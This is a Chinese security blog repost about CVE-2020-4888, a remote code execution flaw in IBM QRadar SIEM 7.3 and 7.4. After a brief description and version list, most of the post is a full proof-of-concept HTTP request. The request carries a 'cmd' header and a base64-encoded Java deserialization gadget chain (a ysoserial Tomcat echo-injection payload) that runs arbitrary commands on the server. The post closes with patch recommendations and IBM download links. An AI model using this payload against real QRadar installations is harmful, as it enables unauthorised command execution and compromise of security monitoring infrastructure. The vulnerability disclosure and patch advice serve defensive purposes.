IBM QRadar SIEM远程代码执行漏洞 (CVE-2020-4888 POC)

admin 2021年5月6日04:24:35评论76 views字数 9929阅读33分5秒阅读模式


IBM QRadar SIEM远程代码执行漏洞 (CVE-2020-4888 POC)


        IBM QRadar SIEM是美国IBM公司的一套利用安全智能保护资产和信息远离高级威胁的解决方案。该方案提供对整个IT架构范围进行监督、生成详细的数据访问和用户活动报告等功能。


IBM QRadar SIEM 


  • 7.4.0 to 7.4.2 Patch 1 

  • 7.3.0 to 7.3.3 Patch 7 


        存在安全漏洞,该漏洞允许远程攻击者可利用该漏洞在系统上执行任意命令。


POC:


POST /console/remoteJavaScript HTTP/1.1Host: <Host>User-Agent: python-requests/2.24.0Connection: closeSEC: af4420ac-7116-4be9-b7b9-94c4595c7a42Cookie: JSESSIONID=A7526C2DD5CE837DF89E0B3D0D242880;Content-Length: 8745cmd: <Command Here>
{"method""qradar.getColumnDefinitionString""QRadarCSRF""a849abdb-f64f-495f-9407-2eafe3b074d0""id""63274893""params": {"variables""rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAIAAAACc3IAKGNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLk9iamVjdEJlYW6CmQfedgSUSgIAA0wADl9jbG9uZWFibGVCZWFudAAtTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL0Nsb25lYWJsZUJlYW47TAALX2VxdWFsc0JlYW50ACpMY29tL3N1bi9zeW5kaWNhdGlvbi9mZWVkL2ltcGwvRXF1YWxzQmVhbjtMAA1fdG9TdHJpbmdCZWFudAAsTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL1RvU3RyaW5nQmVhbjt4cHNyACtjb20uc3VuLnN5bmRpY2F0aW9uLmZlZWQuaW1wbC5DbG9uZWFibGVCZWFu3WG7xTNPa3cCAAJMABFfaWdub3JlUHJvcGVydGllc3QAD0xqYXZhL3V0aWwvU2V0O0wABF9vYmp0ABJMamF2YS9sYW5nL09iamVjdDt4cHNyAB5qYXZhLnV0aWwuQ29sbGVjdGlvbnMkRW1wdHlTZXQV9XIdtAPLKAIAAHhwc3EAfgACc3EAfgAHcQB%2bAAxzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA/////3VyAANbW0JL/RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF/gGCFTgAgAAeHAAABLiyv66vgAAADQA7woAOgB/CACACgCBAIIIAGsKAIEAgwcAhAgAaggAaAcAhQgAhgoACQCHCgAJAIgHAIkKAAkAigoACQCLBwCMCgAJAI0KABAAjgcAjwgAbAsAEwCQCgAQAH8KAAkAkQoACQCSBwCTCwAZAJQHAJUIAFYHAJYIAFgJAJcAmAgAmQoAmgCbCgAlAJwIAJ0KACUAngcAnwgAoAgAoQgAoggAowoApAClCgCkAKYKAKcAqAcAqQoALQCqCACrCgAtAKwKAC0ArQoALQCuCACvCgCwALEKALAAsgoAsACzBwC0CgA3ALUHALYHALcBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvVG9tY2F0RWNob0luamVjdDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAuAEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAA5yZXNwb25zZUZhY2FkZQEAH0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTsBAAF3AQAQTGphdmEvaW8vV3JpdGVyOwEADXJlc3BvbnNlRmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAIcmVzcG9uc2UBAChMb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVzcG9uc2U7AQALdXNpbmdXcml0ZXIBAAdpc0xpbnV4AQABWgEABW9zVHlwAQASTGphdmEvbGFuZy9TdHJpbmc7AQAEY21kcwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAJpbgEAFUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAAXMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAGb3V0cHV0AQAWV1JBUF9TQU1FX09CSkVDVF9GSUVMRAEAGGxhc3RTZXJ2aWNlZFJlcXVlc3RGaWVsZAEAGWxhc3RTZXJ2aWNlZFJlc3BvbnNlRmllbGQBAA5tb2RpZmllcnNGaWVsZAEAFGxhc3RTZXJ2aWNlZFJlc3BvbnNlAQAXTGphdmEvbGFuZy9UaHJlYWRMb2NhbDsBABNsYXN0U2VydmljZWRSZXF1ZXN0AQAQV1JBUF9TQU1FX09CSkVDVAEAA2NtZAEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQA4TGphdmEvbGFuZy9UaHJlYWRMb2NhbDxMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7PjsBADdMamF2YS9sYW5nL1RocmVhZExvY2FsPExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0Oz47AQANU3RhY2tNYXBUYWJsZQcAhQcAjAcAnwcAkwcAuQcAlgcAXgcAugcAqQcAtAEAClNvdXJjZUZpbGUBABVUb21jYXRFY2hvSW5qZWN0LmphdmEMADsAPAEALm9yZy5hcGFjaGUuY2F0YWxpbmEuY29yZS5BcHBsaWNhdGlvbkRpc3BhdGNoZXIHALsMALwAvQwAvgC/AQAvb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ2hhaW4BABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAEACW1vZGlmaWVycwwAwADBDADCAMMBABpqYXZhL2xhbmcvcmVmbGVjdC9Nb2RpZmllcgwAxADFDADGAMcBABVqYXZhL2xhbmcvVGhyZWFkTG9jYWwMAMgAyQwAxgDKAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAwAywDMDADNAM4MAM8A0AEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlDADRANIBACxvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZUZhY2FkZQEAJm9yZy9hcGFjaGUvY2F0YWxpbmEvY29ubmVjdG9yL1Jlc3BvbnNlBwDTDADUANUBAAdvcy5uYW1lBwDWDADXAMwMANgA2QEAA3dpbgwA2gDbAQAQamF2YS9sYW5nL1N0cmluZwEAAnNoAQACLWMBAAdjbWQuZXhlAQACL2MHANwMAN0A3gwA3wDgBwDhDADiAOMBABFqYXZhL3V0aWwvU2Nhbm5lcgwAOwDkAQACXGEMAOUA5gwA5wDoDADpANkBAAAHALkMAOoA6wwA7AA8DADtADwBABNqYXZhL2xhbmcvRXhjZXB0aW9uDADuADwBACN5c29zZXJpYWwvcGF5bG9hZHMvVG9tY2F0RWNob0luamVjdAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAA5qYXZhL2lvL1dyaXRlcgEAE2phdmEvaW8vSW5wdXRTdHJlYW0BAA9qYXZhL2xhbmcvQ2xhc3MBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEADGdldE1vZGlmaWVycwEAAygpSQEABnNldEludAEAFihMamF2YS9sYW5nL09iamVjdDtJKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACmdldEJvb2xlYW4BABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldEhlYWRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADc2V0AQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylWAQAKc2V0Qm9vbGVhbgEAFihMamF2YS9sYW5nL09iamVjdDtaKVYBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAEWphdmEvbGFuZy9Cb29sZWFuAQAFRkFMU0UBABNMamF2YS9sYW5nL0Jvb2xlYW47AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gBAAVjbG9zZQEAD3ByaW50U3RhY2tUcmFjZQAhADkAOgAAAAAABAABADsAPAABAD0AAAAvAAEAAQAAAAUqtwABsQAAAAIAPgAAAAYAAQAAABcAPwAAAAwAAQAAAAUAQABBAAAAAQBCAEMAAgA9AAAAPwAAAAMAAAABsQAAAAIAPgAAAAYAAQAAAFEAPwAAACAAAwAAAAEAQABBAAAAAAABAEQARQABAAAAAQBGAEcAAgBIAAAABAABAEkAAQBCAEoAAgA9AAAASQAAAAQAAAABsQAAAAIAPgAAAAYAAQAAAFcAPwAAACoABAAAAAEAQABBAAAAAAABAEQARQABAAAAAQBLAEwAAgAAAAEATQBOAAMASAAAAAQAAQBJAAgATwA8AAEAPQAAA%2bsABAATAAABsRICuAADEgS2AAVLEgYSB7YABUwSBhIItgAFTRIJEgq2AAVOLQS2AAstKiq2AAwQ7362AA4tKyu2AAwQ7362AA4tLCy2AAwQ7362AA4qBLYACysEtgALLAS2AAssAbYAD8AAEDoEKwG2AA/AABA6BSoBtgARNgYZBcYAGBkFtgASwAATwAATEhS5ABUCAKcABAE6BxUGmQANGQTGAAgZBccAJCsBuwAQWbcAFrYAFywBuwAQWbcAFrYAFyoBBLYAGKcA6BkHxgDjGQS2ABLAABk6CBkIuQAaAQBXGQi5ABoBADoJEhsSHLYABToKGQoEtgALGQoZCLYAD8AAHToLEh0SHrYABToMGQwEtgALGQwZC7IAH7YAFwQ2DRIguAAhOg4ZDsYAExkOtgAiEiO2ACSZAAYDNg0VDZkAGQa9ACVZAxImU1kEEidTWQUZB1OnABYGvQAlWQMSKFNZBBIpU1kFGQdTOg%2b4ACoZD7YAK7YALDoQuwAtWRkQtwAuEi%2b2ADA6ERkRtgAxmQALGRG2ADKnAAUSMzoSGQkZErYANBkJtgA1GQm2ADanAAhLKrYAOLEAAQAAAagBqwA3AAQAPgAAALYALQAAABsACwAcABMAHQAbAB4AIwAfACgAIAA0ACEAQAAiAEwAIwBRACQAVgAlAFsAJwBdACgAZQApAG8AKgB2ACsAkwAsAKIALQCuAC4AugAvAMMAMADIADEA0gAyANoAMwDjADQA7AA1APIANgD%2bADcBBwA4AQ0AOQEXADsBGgA8ASEAPQEzAD4BNgBAAWYAQQFzAEIBgwBDAZcARAGeAEUBowBGAagASwGrAEkBrABKAbAATAA/AAAAygAUANIA1gBQAFEACADjAMUAUgBTAAkA7AC8AFQAVQAKAP4AqgBWAFcACwEHAKEAWABVAAwBGgCOAFkAWgANASEAhwBbAFwADgFmAEIAXQBeAA8BcwA1AF8AYAAQAYMAJQBhAGIAEQGXABEAYwBcABIACwGdAGQAVQAAABMBlQBlAFUAAQAbAY0AZgBVAAIAIwGFAGcAVQADAGUBQwBoAGkABABvATkAagBpAAUAdgEyAGsAWgAGAJMBFQBsAFwABwGsAAQAbQBuAAAAbwAAABYAAgBlAUMAaABwAAQAbwE5AGoAcQAFAHIAAAB4AAz/AJAABwcAcwcAcwcAcwcAcwcAdAcAdAEAAEAHAHX8ABAHAHUg/wByAA8HAHMHAHMHAHMHAHMHAHQHAHQBBwB1BwB2BwB3BwBzBwB4BwBzAQcAdQAAGlIHAHn%2bAC4HAHkHAHoHAHtBBwB1/wASAAAAAEIHAHwEAAEAfQAAAAIAfnVxAH4AFwAAAdTK/rq%2bAAAANAAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA7AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4c3IAKGNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLkVxdWFsc0JlYW71ihi75fYYEQIAAkwACl9iZWFuQ2xhc3N0ABFMamF2YS9sYW5nL0NsYXNzO0wABF9vYmpxAH4ACXhwdnIAHWphdmF4LnhtbC50cmFuc2Zvcm0uVGVtcGxhdGVzAAAAAAAAAAAAAAB4cHEAfgAUc3IAKmNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLlRvU3RyaW5nQmVhbgn1jkoPI%2b4xAgACTAAKX2JlYW5DbGFzc3EAfgAcTAAEX29ianEAfgAJeHBxAH4AH3EAfgAUc3EAfgAbdnEAfgACcQB%2bAA1zcQB%2bACBxAH4AI3EAfgANcQB%2bAAZxAH4ABnEAfgAGeA%3d%3d"}}




处置建议

        

        目前该漏洞已被修复,建议升级至如下版本:

QRadar/QRM/QVM 7.4.2 Patch 2

下载链接:

https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Vulnerability+Manager&release=All&platform=All&function=fixId&fixids=7.4.2-QRADAR-QRSIEM-20210120225428&includeRequisites=1&includeSupersedes=0&downloadMethod=http&source=SAR

 

QRadar/QRM/QVM 7.3.3 Patch 7 IF 1

下载链接:

https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Vulnerability+Manager&release=All&platform=All&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20210120163940INT&includeRequisites=1&includeSupersedes=0&downloadMethod=http&source=SAR



本文始发于微信公众号(Khan安全团队):IBM QRadar SIEM远程代码执行漏洞 (CVE-2020-4888 POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月6日04:24:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   IBM QRadar SIEM远程代码执行漏洞 (CVE-2020-4888 POC)http://cn-sec.com/archives/272016.html

发表评论

匿名网友 填写信息